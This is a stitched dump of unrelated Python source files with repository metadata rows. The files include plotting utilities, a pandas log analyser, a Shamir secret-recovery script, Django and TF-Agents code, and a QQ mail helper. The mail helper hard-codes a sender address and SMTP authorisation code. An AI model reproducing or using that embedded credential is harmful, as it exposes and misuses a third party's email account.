    """Greyscale ramp: black at v=0, white at v=1."""
    return (v,) * 3
def gradient_rgb_gbr(v):
    """Green -> blue -> red ramp built from Gaussian palette stops."""
    stops = {0: [0, 255, 0], 0.5: [0, 0, 255], 1: [255, 0, 0]}
    return isogradient(v, stops)


def gradient_rgb_gbr_full(v):
    """Green -> cyan -> blue -> magenta -> red ramp."""
    stops = {
        0: [0, 255, 0],
        1 * (1 / 4): [0, 255, 255],
        2 * (1 / 4): [0, 0, 255],
        3 * (1 / 4): [255, 0, 255],
        1: [255, 0, 0],
    }
    return isogradient(v, stops)
def gradient_rgb_wb_custom(v):
    """White -> magenta -> blue -> cyan -> green -> yellow -> red -> black."""
    stops = {
        0: [255, 255, 255],
        1 * (1 / 7): [255, 0, 255],
        2 * (1 / 7): [0, 0, 255],
        3 * (1 / 7): [0, 255, 255],
        4 * (1 / 7): [0, 255, 0],
        5 * (1 / 7): [255, 255, 0],
        6 * (1 / 7): [255, 0, 0],
        1: [0, 0, 0],
    }
    return isogradient(v, stops)
def interval(start, stop, value):
    """Map value in [0, 1] linearly onto the range [start, stop]."""
    span = stop - start
    return start + span * value
def gradient_hsv_bw(v):
    """Greyscale ramp expressed in HSV (saturation fixed at 0)."""
    return hsv2rgb(0, 0, v)
def gradient_hsv_gbr(v):
    """Hue sweep from green (120 deg) through blue to red (360 deg)."""
    return hsv2rgb(interval(120, 360, v), 1, 1)
def gradient_hsv_unknown(v):
    """Half-saturated hue sweep from green (120 deg) down to red (0 deg)."""
    return hsv2rgb(120 - 120 * v, 0.5, 1)
def gradient_hsv_custom(v):
    """Full hue circle; saturation fades as 1 - v**2 (clamped by n)."""
    return hsv2rgb(360 * (v), n(1 - v**2), 1)
if __name__ == "__main__":
    def toname(g):
        # Derive a display label from the function name,
        # e.g. gradient_rgb_bw -> "RGB-BW".
        return g.__name__.replace("gradient_", "").replace("_", "-").upper()
    # XXX: test_gradient(gradient_rgb_gbr_full)
    # All gradient callables to render, one horizontal bar each.
    gradients = (
        gradient_rgb_bw,
        gradient_rgb_gbr,
        gradient_rgb_gbr_full,
        gradient_rgb_wb_custom,
        gradient_hsv_bw,
        gradient_hsv_gbr,
        gradient_hsv_unknown,
        gradient_hsv_custom,
    )
    plot_color_gradients(gradients, [toname(g) for g in gradients])
| [
"maciejanthonyczyzewski@gmail.com"
] | maciejanthonyczyzewski@gmail.com |
f3b4ddcd9fbba237e91724f8cfa958504def9ca8 | 51a3abc644875ae0e644891c8c9c0d6736ddbb12 | /meta-Numeriseur/recipes-microphone/microphone/microphone/setup.py | 2b1cd05ea5dfec8847b2852eec5638975c467fcf | [] | no_license | sangmohamad/numeriseur | f2222cfa9e130922bbc39efcd46e13cf8b2acc73 | 20d78e90c2c0f0c6184af127401b3a58f2b2672d | refs/heads/master | 2022-12-05T16:30:44.895356 | 2020-09-01T11:10:34 | 2020-09-01T11:10:34 | 290,131,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | version https://git-lfs.github.com/spec/v1
oid sha256:98719b0fae8cdae1a3e3d68eaa037c3912550d71ca2e318e8e08c8366bb58fa4
size 476
| [
"sanogomohamad9@gmail.com"
] | sanogomohamad9@gmail.com |
class Myclass:
    """Tiny demo class exposing a static multiplication helper."""

    @staticmethod
    def prod(x, y):
        """Return the product of x and y."""
        return x * y


res = Myclass.prod(12, 6)
print('result=', res)
| [
"krish888@gmail.com"
] | krish888@gmail.com |
7e6eab47934ec89549b741534085981ee5ab9560 | 74335cf752db684dca020483b440a89c20642723 | /hal_plugin/plotting/plotting.py | 37762efac41776acc518651582d84a18418610d3 | [] | no_license | ChillkroeteTTS/Comparison-of-Two-Optimization-Methods-for-Operating-a-Smart-Home-Power-Grid | 707ae315c06a90bfd5ba2ee6191afc430e391ea1 | 5319f89a3c00e67034b5b4714734e253c8c7a518 | refs/heads/master | 2022-10-01T21:46:29.331228 | 2020-06-02T12:34:15 | 2020-06-02T12:34:15 | 268,785,317 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,982 | py | from pathlib import Path
import pandas as pd
import matplotlib.pyplot as plt
from pandas import DataFrame
from hal_plugin.plotting.hal_data_processing import load_hal_b1_df, hal_load_import_kwh, load_hal_storage_df, \
load_hal_p2h_df, load_all_hal_results
from hal_plugin.plotting.oemof_data_processing import load_oemof_net_power_flow, load_oemof_costs
from oemof_runs.plot import get_storage_data_from_saved_model
def plot_storage_diff(hal_dir, sim_name, oemof_results):
    """Plot HAL-vs-oemof state-of-charge difference for power and heat storage."""
    oemof_storage_df, oemof_h_storage_df = get_storage_data_from_saved_model(oemof_results)
    hal_storage_df, hal_heat_storage_df = load_hal_storage_df(hal_dir, sim_name)
    # assumes both storages have a fixed capacity of 4000 -- TODO confirm units
    storage_max_capacity = 4000
    diff = hal_storage_df['soc begin[%]'] - (
            oemof_storage_df[(('storage', 'None'), 'capacity')] / storage_max_capacity) * 100
    h_diff = hal_heat_storage_df['soc begin[%]'] - (
            oemof_h_storage_df[(('heat_storage', 'None'), 'capacity')] / storage_max_capacity) * 100
    diff_df = pd.DataFrame({'power soc diff': diff,
                            'heat soc diff': h_diff})
    # NOTE(review): set_index is not in-place and the result is discarded,
    # so this line has no effect.
    diff_df.set_index(hal_storage_df.index)
    diff_df.plot(title='SOC Storage Difference -=hal, +=oemof', subplots=True)
def plot_general_hal_results(result_dir: Path):
    """Plot every HAL result column, alphabetically ordered, as subplots."""
    df = load_all_hal_results(result_dir)
    df2 = df.reindex(sorted(df.columns), axis=1)
    df2.plot(title='HAL Results', subplots=True, sort_columns=True)
def plot_net_power_flow_analysis(hal_result_dir, sim_name, oemof_results):
    """Compare HAL and oemof net power flow: time series, histogram, box plot."""
    oemof_net_power_flow = load_oemof_net_power_flow(oemof_results)
    hal_net_power_flow = load_hal_b1_df(hal_result_dir, sim_name)
    fig, axes = plt.subplots(nrows=3)
    net_flow_df = pd.DataFrame(
        {'hal': hal_net_power_flow['res_power[W]'], 'oemof': oemof_net_power_flow['net_power_flow']},
        index=oemof_net_power_flow.index)
    net_flow_df.plot(title='Net Power Flows [w] (positive = import)', ax=axes[0])
    net_flow_df.plot.hist(bins=100, ax=axes[1])
    net_flow_df.plot.box(ax=axes[2], showfliers=False, grid=True)
def plot_kwh_analysis(hal_result_dir, sim_name, oemof_results):
    """Compare imported kWh totals between HAL and oemof (Wh / 1000)."""
    hal_import = hal_load_import_kwh(hal_result_dir, sim_name)
    oemof_import = load_oemof_costs(oemof_results)
    fig, axes = plt.subplots(nrows=3)
    total_hal = hal_import['wh_total'] / 1000
    total_oemof = oemof_import['wh_total'] / 1000
    mixed_costs = pd.DataFrame({
        # 'hal_power_import': hal_import['wh'] / 1000,
        # 'oemof_power_import': oemof_import['wh'] / 1000,
        # 'hal_heat_import': hal_import['wh (heat)'] / 1000,
        # 'oemof_heat_import': oemof_import['wh (heat)'] / 1000,
        'hal_total_import': total_hal,
        'oemof_total_import': total_oemof,
        'import_diff': total_oemof - total_hal
    },
        index=oemof_import.index)
    mixed_costs.plot(title=f"KWh imported ", ax=axes[0])
    mixed_costs.cumsum().plot(title='Cummulated Imported KWh', ax=axes[1])
    mixed_costs.sum().plot.bar(title='Total KWh comparison', ax=axes[2], grid=True)
def plot_heat_storage_details(oemof_results, result_dir, sim_name):
    """Plot oemof and HAL heat-storage detail columns side by side."""
    b, h_df = load_hal_storage_df(result_dir, sim_name)
    oemof_results['heat_storage'].plot(kind='line', drawstyle='steps-post', title='Oemof Heat Storage Details',
                                       subplots=True)
    h_df.plot(subplots=True, title='HAL Heat Storage Details')
def plot_p2h_details(oemof_results, result_dir, sim_name):
    """Plot oemof heat-flow data alongside the HAL power-to-heat details."""
    p2h: DataFrame = load_hal_p2h_df(result_dir, sim_name)
    oemof_results['b_h_data'].plot(kind='line', drawstyle='steps-post', title='Oemof Heat Flow', subplots=True)
    p2h.plot(subplots=True, title='P2H Details')
def plot_prices(result_dir, sim_name):
    """Plot the local market price series for the B1 bus and the P2H unit."""
    b1: DataFrame = load_hal_b1_df(result_dir, sim_name)
    p2h: DataFrame = load_hal_p2h_df(result_dir, sim_name)
    fig, axes = plt.subplots(2, 1)
    b1[['local_price']].plot(title='B1 Market Price', ax=axes[0])
    p2h[['local_price']].plot(title='P2H Market Price', ax=axes[1])
| [
"smalla@jungehaie.com"
] | smalla@jungehaie.com |
03194fe1c2acc52f79cbbb67c76e3da83d9c9fe0 | 00f9aa8242466e87639604c2c650ba97991fc878 | /AID.py | 7d056760070587fb2b88d278073f99268294b313 | [] | no_license | rakshan-fathima/aura-analysis- | 9a4d984e0c43d9d385fb18cb6889c255f4103acf | 28aa8337b56a69ebbe1eced270e512adb880c9ed | refs/heads/main | 2023-07-14T00:57:28.598138 | 2021-08-18T19:30:19 | 2021-08-18T19:30:19 | 397,235,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,686 | py | import pandas as pd
from pandas._libs import indexing
from pandas.core.frame import DataFrame
import time
from datetime import datetime
import math
# Load the click log -- NOTE(review): hard-coded absolute path; make this
# configurable before reuse.
df = pd.read_csv('/Users/rakshanfathima/Desktop/data.csv')
print(df.to_string())
# counts number of times each AID is clicked
# NOTE(review): the result of value_counts is discarded, so this line only
# computes and throws away the counts.
df.value_counts('AID')
array = []
# gets unique values from dataframe and stores in the array
# (the empty-list initialisation above is immediately overwritten)
array = df['AID'].unique()
print(array)
def timedifference():
    """Convert the module-global df_new's TimeDifference column (seconds)
    into consecutive deltas: row i-1 becomes row i minus row i-1.

    NOTE(review): relies on the global df_new set inside the loop below, and
    assigns through chained indexing (Series.iloc), which pandas may flag as
    a SettingWithCopyWarning -- verify the writes actually land in df_new.
    """
    for i in range(0, len(df_new)):
        # print(i)
        if i == 0:
            continue
        else:
            df_new['TimeDifference'].iloc[i - 1] = df_new['TimeDifference'].iloc[i] - df_new['TimeDifference'].iloc[ i - 1]
def dataprocessing():
    """Split df_new into >=30-minute (1800 s) sessions and print, per AID,
    either a mean click time or a mean +/- one-std-dev low/high window.

    NOTE(review): also mutates `frame`, a slice of df_new, via chained
    assignment, and the else-branch below reads mean_in_hours/minutes from a
    *previous* iteration -- a NameError on the first single-row session.
    """
    timediff = df_new['TimeDifference']
    start = 0
    for i in range(0, len(timediff)):
        if (timediff[i] - timediff[0] >= 1800):
            frame = df_new.iloc[start:i + 1]
            # Reduce "date HH:MM:SS" timestamps to minutes since midnight.
            frame['TimeStamp'] = frame['TimeStamp'].apply(lambda x: x.split(' ')[1])
            frame['TimeStamp'] = frame['TimeStamp'].apply(lambda x: x.split(':'))
            frame['TimeStamp'] = frame['TimeStamp'].apply(lambda x: int(x[0]) * 60 + int(x[1]))
            # if condition - calculate if rows>1
            if (len(frame) > 1):
                mean = frame['TimeStamp'].mean()
                mean_in_hours = mean / 60
                std = frame['TimeStamp'].std()
                std_in_hours = std/60
                x = (mean_in_hours)
                y = std_in_hours
                low = x - y
                high = x + y
                minutes = mean_in_hours*60
                # fractional hour -> minutes for the window bounds
                minlow = (low%1) * 60
                minhigh = (high%1) *60
                mean_in_hours, minutes = divmod(minutes, 60)
                print ( frame['AID'].iloc[0] , 'low :' "%02d:%02d"%(low,minlow), 'high :' "%02d:%02d"%(high,minhigh))
            else:
                print (frame['AID'].iloc[0], "%02d:%02d"%(mean_in_hours,minutes))
            start = i + 1
for item in array[0:]:
    #print (item)
    # splits dataframes according to AID
    df_new = df[df['AID'] == item]
    print(df_new)
    # extracting time from the TimeStamp
    # NOTE(review): df_new was sliced *before* df gained the TimeDifference
    # column, so the next line may not be visible in df_new as intended.
    df['TimeDifference'] = df['TimeStamp'].apply(lambda x: x.split(' ')[1])
    df_new['TimeDifference'] = df_new['TimeDifference'].apply(lambda x: x.split(':'))
    df_new['TimeDifference'] = df_new['TimeDifference'].apply(lambda x: int(x[0]) * 60 * 60 + int(x[1]) * 60 + int(x[2]))
    df_new.reset_index(level=None, drop=False, inplace=True, col_level=0, col_fill='')
    timedifference()
    dataprocessing()
| [
"noreply@github.com"
] | rakshan-fathima.noreply@github.com |
b21ca81ebbd84748400bf7a9b1252ac3a962a904 | 7163ba498cf98aaf8018b66fe0552406718ffa3d | /zjutapis/utils/MailUtil.py | bc4d6eb73158a1484d622dcdc9aa70b85e41325b | [] | no_license | chnnnnng/chngkit | 0222041e2c14ba9821d5fad832137441655b8517 | 5bbf07a6cd4cd3d21209aca64605b9cedac49ad2 | refs/heads/master | 2022-11-30T04:39:15.903659 | 2020-08-18T09:38:46 | 2020-08-18T09:38:46 | 276,799,600 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,017 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import datetime
import smtplib
import time
from email.mime.text import MIMEText
from email.utils import formataddr
#用法:
# mail = MailUtil()
# ret = mail.setUser('596552206@qq.com').setTitle('nihaowa!').setContent('zheshicontent!').send()
# print('Success' if ret else 'Error')
class MailUtil:
    """Fluent helper for sending a styled HTML notification mail via QQ SMTP.

    Usage:
        ret = MailUtil().setUser(to).setTitle(title).setContent(body).send()
    """
    # NOTE(review): credentials are hard-coded; move them to configuration
    # or environment variables before shipping.
    __my_sender = '3340333414@qq.com' # sender's email account
    __my_pass = 'cyqamwgwljorchea' # sender's SMTP authorisation code
    __title = ''
    __content = ''
    __user = ''
    # HTML template; the two {} placeholders receive title and content.
    __html = '''
    <table class="body" style="width: 100%; background-color: #fff;" width="100%" bgcolor="#fff"><tbody><tr>
    <td style="vertical-align: top;" valign="top"></td>
    <td class="container" style="vertical-align: top; display: block; max-width: 580px; width: 580px; margin: 0 auto; padding: 24px;" width="580" valign="top">
    <div class="content" style="display: block; max-width: 580px; margin: 0 auto;">
    <div class="header" style="width: 100%; padding-top: 8px; padding-bottom: 8px; margin-bottom: 16px; border-bottom-width: 1px; border-bottom-color: #eee; border-bottom-style: solid;">
    <table style="width: 100%;" width="100%">
    <tbody>
    <tr>
    <td style="vertical-align: top;" valign="top">
    <a href="https://chng.fun" style="color: #0d1740; text-decoration: none;" rel="noopener" target="_blank">
    <h2>CHNG · 小柏</h2>
    </a>
    </td>
    </tr>
    </tbody>
    </table>
    </div>
    <div class="mb-2" style="margin-bottom: 8px !important;">
    <div class="h2 lh-condensed" style="font-size: 24px !important; font-weight: 600 !important; line-height: 1.25 !important;">
    {}
    </div>
    </div>
    <div class="pb-2" style="padding-bottom: 8px !important;">
    <div class="mb-3" style="margin-bottom: 16px !important;">
    <p>{}</p>
    </div>
    </div>
    <div class="footer" style="clear: both; width: 100%;">
    <hr class="footer-hr" style="height: 0; overflow: visible; margin-top: 24px; border-top-color: #e1e4e8; border-top-style: solid; color: #959da5; font-size: 12px; line-height: 18px; margin-bottom: 30px; border-width: 1px 0 0;">
    <p class="footer-text" style="font-weight: normal; color: #959da5; font-size: 12px; line-height: 18px; margin: 0 0 15px;">不要回复!不要回复!不要回复!</p>
    </div>
    </div>
    </td>
    <td style="vertical-align: top;" valign="top"></td>
    </tr></tbody></table>
    '''
    def setTitle(self,title):
        """Set the mail subject/heading; returns self for chaining."""
        self.__title = title;
        return self
    def setContent(self,content):
        """Set the mail body text; returns self for chaining."""
        self.__content = content
        return self
    def setUser(self,user):
        """Set the recipient address; returns self for chaining."""
        self.__user = user
        return self
    def send(self):
        """Send the mail; returns True on success, False on any failure.

        Requires a recipient and a title; an empty content falls back to the
        title. All send errors are swallowed and reported as False.
        """
        if self.__user == '':
            return False
        if self.__title == '':
            return False
        if self.__content == '':
            self.__content = self.__title
        ret = True
        try:
            msg = MIMEText(self.__html.format(self.__title,self.__content), 'html', 'utf-8')
            msg['From'] = formataddr(["小柏", self.__my_sender]) # sender nickname and address
            msg['To'] = formataddr(["亲爱的陌生人", self.__user]) # recipient nickname and address
            msg['Subject'] = self.__title # mail subject line
            server = smtplib.SMTP_SSL("smtp.qq.com", 465) # sender's SMTP server, SSL port 465
            server.login(self.__my_sender, self.__my_pass) # authenticate as the sender
            server.sendmail(self.__my_sender, [self.__user, ], msg.as_string()) # sender, recipients, message
            server.quit() # close the connection
        except Exception: # any failure in the try block yields ret=False
            ret = False
        return ret
"chenyang20010703@outlook.com"
] | chenyang20010703@outlook.com |
42dd0bfc1ee2056fa9d507a9f20221003145d2a8 | 32791ee75360bd7c6e7571be8f6e23af6aafabc2 | /Tools/shamir/shamir_scheme.py | bd422adbd7f4f0ead40a32d67eafb00df8d1ef9a | [] | no_license | joshuahaddad/CRYPTO | 69e47d5378af91710c74c1c760a472fbf9b65a30 | d11aea92d8f89f608ef7367db250cce69a7e42b8 | refs/heads/master | 2020-08-05T03:48:27.945400 | 2019-10-02T15:58:00 | 2019-10-02T15:58:00 | 212,382,641 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,417 | py | import requests
import os
from Crypto.Util.number import *
import threading
"""
Original code:
https://github.com/perfectblue/ctf-writeups/blob/master/csaw-ctf-2019-quals/timelie-150/solve.py
This framework can be used to crack a Shamir Sharing scheme
If the key is split into multiple parts, it is probably a Shamir Scheme
Given S = key, S is divided into n pieces Sn
Knowing k pieces allows the reconstruction of S.
This is based on the idea that 2 points are needed for a line, 3 for parab, etc
For any curve, you need k-1 points to define the curve where k = order
Curve is constructed with f(x) = a_0 + a_1x + ... + a_(k-1)x^(k-1)
k is the number of parts you would need to reconstruct the curve
a_0 = Secret = S
Take integers i such that i is an integer and f(i) = integer, these are the pieces
Coefficients are found for the curve using interpolation.
"""
"""
USAGE:
Write something to gather shares. Send array of shares to recover_secret()
"""
def _eval_at(poly, x, prime):
'''evaluates polynomial (coefficient tuple) at x, used to generate a
shamir pool in make_random_shares below.
'''
accum = 0
for coeff in reversed(poly):
accum *= x
accum += coeff
accum %= prime
return accum
def _extended_gcd(a, b):
'''
division in integers modulus p means finding the inverse of the
denominator modulo p and then multiplying the numerator by this
inverse (Note: inverse of A is B such that A*B % p == 1) this can
be computed via extended Euclidean algorithm
http://en.wikipedia.org/wiki/Modular_multiplicative_inverse#Computation
'''
x = 0
last_x = 1
y = 1
last_y = 0
while b != 0:
quot = a // b
a, b = b, a%b
x, last_x = last_x - quot * x, x
y, last_y = last_y - quot * y, y
return last_x, last_y
def _divmod(num, den, p):
'''compute num / den modulo prime p
To explain what this means, the return value will be such that
the following is true: den * _divmod(num, den, p) % p == num
'''
inv, _ = _extended_gcd(den, p)
return num * inv
def _lagrange_interpolate(x, x_s, y_s, p):
'''
Find the y-value for the given x, given n (x, y) points;
k points will define a polynomial of up to kth order
'''
k = len(x_s)
assert k == len(set(x_s)), "points must be distinct"
def PI(vals): # upper-case PI -- product of inputs
accum = 1
for v in vals:
accum *= v
return accum
nums = [] # avoid inexact division
dens = []
for i in range(k):
others = list(x_s)
cur = others.pop(i)
nums.append(PI(x - o for o in others))
dens.append(PI(cur - o for o in others))
den = PI(dens)
num = sum([_divmod(nums[i] * den * y_s[i] % p, dens[i], p)
for i in range(k)])
return (_divmod(num, den, p) + p) % p
def recover_secret(shares, prime):
'''
Recover the secret from share points
(x,y points on the polynomial)
'''
if len(shares) < 2:
raise ValueError("need at least two shares")
x_s, y_s = zip(*shares)
return _lagrange_interpolate(0, x_s, y_s, prime)
# Prime modulus for the Shamir scheme (must exceed secret and share values).
P = 101109149181191199401409419449461491499601619641661691809811881911
# Known shares as (x, f(x)) tuples; three points fix the quadratic.
shares = [(1, 1494), (2, 1942), (3,2578)]
# Reconstruct and print the secret, i.e. f(0).
print(recover_secret(shares, P))
print("DONE")
| [
"joshuahaddad@ufl.edu"
] | joshuahaddad@ufl.edu |
4f5087097ca2cae5e745fbb0c584e49824c602e8 | 3323e54364b4f4543e585b3d157ed9b52de02ade | /math3/tests/test_integer.py | 3e2e6c09d76edc857718fd33688737bed5107fbb | [
"BSD-3-Clause"
] | permissive | PhloxAR/math3 | f8fbc51687abf1d909b100648035ed8be1265dc6 | 6c8e4066ae74b607cefa209c42cb19e26c09c600 | refs/heads/master | 2021-01-18T11:37:11.249811 | 2016-05-22T15:23:40 | 2016-05-22T15:23:40 | 58,250,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | try:
import unittest2 as unittest
except:
import unittest
from math3.funcs import integer
class test_integer(unittest.TestCase):
    """Unit tests for the math3 integer helpers."""
    def test_import(self):
        # The funcs.intfunc module must be reachable through the package.
        import math3
        math3.funcs.intfunc
    def test_count_bits(self):
        # 0b010101 has exactly three set bits.
        value = 0b010101
        self.assertEqual(integer.count_bits(value), 3)
if __name__ == '__main__':
    unittest.main()
| [
"matthias_cy@outlook.com"
] | matthias_cy@outlook.com |
2b92b3efeb473525078506ea21078fc0c598e1d5 | feaf83d9329cc21272dc1c018c38824c576f8730 | /task04/string_methods.py | 35cb0881a966fea919e4ca08a65827bc768c82ef | [] | no_license | aditir360/LMSClub | 6c9b60a898a1007b7ec2e067714a9385b125b563 | 3f96a4be2d245b7aee60e28c4e8d36d194f7f848 | refs/heads/master | 2023-02-03T02:28:41.464166 | 2020-12-28T00:06:12 | 2020-12-28T00:06:12 | 296,700,210 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | #!/usr/bin/env python3
#
# This is my code which includes functions that apply for strings.
#
def main():
    """Demonstrate two str case-conversion methods: casefold and capitalize."""
    # FIRST EXAMPLE
    txt = "Python is an awesome and easy Programming Language to learn!"
    # casefold() lowercases every character (an aggressive lower() that also
    # folds special case mappings for caseless comparison).
    txt_using_function_task04 = txt.casefold()
    print(txt_using_function_task04)
    # SECOND EXAMPLE
    txt1 = "python is an awesome and easy programming language to learn!"
    # BUG FIX: the original called txt1.capitilize(), which raises
    # AttributeError at runtime -- the str method is spelled capitalize().
    # capitalize() upper-cases the first character and lower-cases the rest.
    txt1_using_function_task04 = txt1.capitalize()
    print(txt1_using_function_task04)
| [
"noreply@github.com"
] | aditir360.noreply@github.com |
061837399d3afe6268af1545249000dc7f583c40 | b9429e2a5b6ebef0e4c87976a82bf4dc075ba27b | /shop/migrations/0004_auto_20200401_0951.py | 0c50516722bfe7a9e44768053b6163f0dbf25522 | [] | no_license | MakboolAhmad/jankin | 97f23014e653499e80939cdc7166fee52ae8b232 | 1a2165e539aba00be101cf599552a8b5434a4283 | refs/heads/master | 2021-08-06T10:05:39.502249 | 2020-04-06T12:22:14 | 2020-04-06T12:22:14 | 253,489,664 | 0 | 0 | null | 2021-06-10T22:44:07 | 2020-04-06T12:23:34 | HTML | UTF-8 | Python | false | false | 533 | py | # Generated by Django 2.2 on 2020-04-01 09:51
from django.db import migrations
class Migration(migrations.Migration):
    """Removes the address, city and location fields from the Product model.

    Auto-generated by Django 2.2; applies after shop migration 0003.
    """

    dependencies = [
        ('shop', '0003_auto_20200330_0743'),
    ]

    operations = [
        # Each RemoveField drops one field (and its database column) from
        # the Product model.
        migrations.RemoveField(
            model_name='product',
            name='address',
        ),
        migrations.RemoveField(
            model_name='product',
            name='city',
        ),
        migrations.RemoveField(
            model_name='product',
            name='location',
        ),
    ]
| [
"makboolk20@gmail.com"
] | makboolk20@gmail.com |
3707cc9f6db7ca10359cd0dda2184f7a2c877a56 | 3587e1e6c5a91d9090d5df2521c9e6ad04cff40f | /includes/libraries/Balanced/scenarios/credit_customer_list/metadata.py | 12868ab8d2814e7b7492c953b255ffbdd3128ef8 | [
"MIT"
] | permissive | bmoney85/EDD-Balanced-Gateway | e13f9bc8f43313847b7d7f941932bfe9cbe411ee | 474d7e724b2d274b4c371141f8a6ac2bf83c919c | refs/heads/master | 2021-05-28T01:32:33.599032 | 2014-04-03T20:01:01 | 2014-04-03T20:01:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | customer = json.loads(
storage['customer_add_bank_account']['response']
)
request = {
'customer_uri': customer['uri'],
'uri': customer['credits_uri'],
'payload': {
'amount': 100,
},
} | [
"dgriffiths@ghost1227.com"
] | dgriffiths@ghost1227.com |
82b234535f523b9c06304b37de9a22bc067c7c74 | c50d9ce8073048532e4556f862f775c4caf5e011 | /examples/receive.py | 70414efbe69bfb12507652804ae2fecb88fb22d2 | [
"MIT"
] | permissive | rickhanlonii/aamnotifs | bc27614a92d6ae27478a3960808d455d6e3b5268 | 8ef14f99ba052e38d30f77d56de38273bf791254 | refs/heads/master | 2021-01-16T20:03:42.459909 | 2013-07-25T13:20:02 | 2013-07-25T13:24:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | ################################################################################
# Simple(st) example for receiving notifications.
################################################################################
import notifs


def print_notification(title, message):
    """Callback invoked for every notification received on the channel."""
    # print(...) with a single argument is valid in both Python 2 and 3.
    print("Notification received: {0}: {1}".format(title, message))


try:
    n = notifs.Notifs("amqps://user:password@domain.tld:5673/%2F")
    # The routing_name is the name of the "channel" you want to use
    # it can be "mail", "chat", etc.
    # This will make it easy to choose which channels your clients
    # will receive. Can be a list too, for listening on multiple streams.
    n.receive("test_channel", print_notification)
except KeyboardInterrupt:
    # BUG FIX: the original used `break` here, which is a SyntaxError
    # outside of a loop. On Ctrl-C we simply stop listening and exit.
    pass
| [
"andrei@marcu.net"
] | andrei@marcu.net |
468bc121358fe3b51c60fe2cdcefb8ee07f614ff | ca3799ce88e9b9ad84bcec00e68dd8c615fdbb3d | /Trabalho_1/core/migrations/0001_initial.py | 993ad8c2c1e789e517faba7354a835b3d0bb89f7 | [
"MIT"
] | permissive | desenho-sw-g5/service_control | d8b4129d33466084239df9f18986e004474ff2b6 | ed0496f72643ac004d58126ac486a6e0c47643cd | refs/heads/devel | 2021-01-20T02:32:52.321505 | 2017-11-27T11:33:15 | 2017-11-27T11:33:15 | 101,324,220 | 3 | 0 | null | 2017-11-24T10:23:14 | 2017-08-24T18:09:29 | Python | UTF-8 | Python | false | false | 769 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-14 16:13
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration for the core app: creates the Person model."""

    initial = True

    dependencies = [
        # Person references AUTH_USER_MODEL, so the (possibly swapped)
        # user model must be migrated first.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Person',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # One-to-one link to the user model; deleting the user deletes
                # the Person, and user.person is the reverse accessor.
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='person', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"matheusrichardt@gmail.com"
] | matheusrichardt@gmail.com |
1581da937574006f29adc83b6be0f88522e15faf | 4f375eec10cd2266c0280aae5ff2704560b6b00f | /DjangoUniversity/venv/bin/django-admin.py | 41744146756b479214d5b32dc5368edad318cd26 | [] | no_license | Jaibean/Python | f1dff66269cce1cdc034c40dd70975870acb7cbf | a9ebcdf2b74f60d80a88d7b76021995d84e7ee8d | refs/heads/main | 2023-05-08T14:33:25.616586 | 2021-05-29T03:20:27 | 2021-05-29T03:20:27 | 317,381,497 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 706 | py | #!/Users/jaimiebertoli/PycharmProjects/DjangoUniversity/venv/bin/python
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"jaimie.bertoli@gmail.com"
] | jaimie.bertoli@gmail.com |
c737c2c9df7e4e431e045cdd97aecd4aa4483742 | dcbb4a526f6cf6f490063a6e4b5f1353fda48a1f | /tf_agents/drivers/tf_driver.py | de16194c74cf80ce5e092c4607046a47a02b73ac | [
"Apache-2.0"
] | permissive | Bhaney44/agents | 91baf121188f35024c09435276d108600ba6f07e | 792d7c6e769d708f8b08d71926ccb9e8a880efef | refs/heads/master | 2023-08-09T03:51:16.188708 | 2023-07-21T17:50:18 | 2023-07-21T17:50:18 | 177,231,436 | 0 | 0 | Apache-2.0 | 2019-03-23T01:46:03 | 2019-03-23T01:46:02 | null | UTF-8 | Python | false | false | 5,527 | py | # coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Driver that steps a TF environment using a TF policy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Any, Callable, Optional, Sequence, Tuple
import numpy as np
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.drivers import driver
from tf_agents.environments import tf_environment
from tf_agents.policies import tf_policy
from tf_agents.trajectories import time_step as ts
from tf_agents.trajectories import trajectory
from tf_agents.typing import types
from tf_agents.utils import common
class TFDriver(driver.Driver):
  """A driver that runs a TF policy in a TF environment."""

  def __init__(
      self,
      env: tf_environment.TFEnvironment,
      policy: tf_policy.TFPolicy,
      observers: Sequence[Callable[[trajectory.Trajectory], Any]],
      transition_observers: Optional[Sequence[Callable[[trajectory.Transition],
                                                       Any]]] = None,
      max_steps: Optional[types.Int] = None,
      max_episodes: Optional[types.Int] = None,
      disable_tf_function: bool = False):
    """A driver that runs a TF policy in a TF environment.

    **Note** about bias when using batched environments with `max_episodes`:
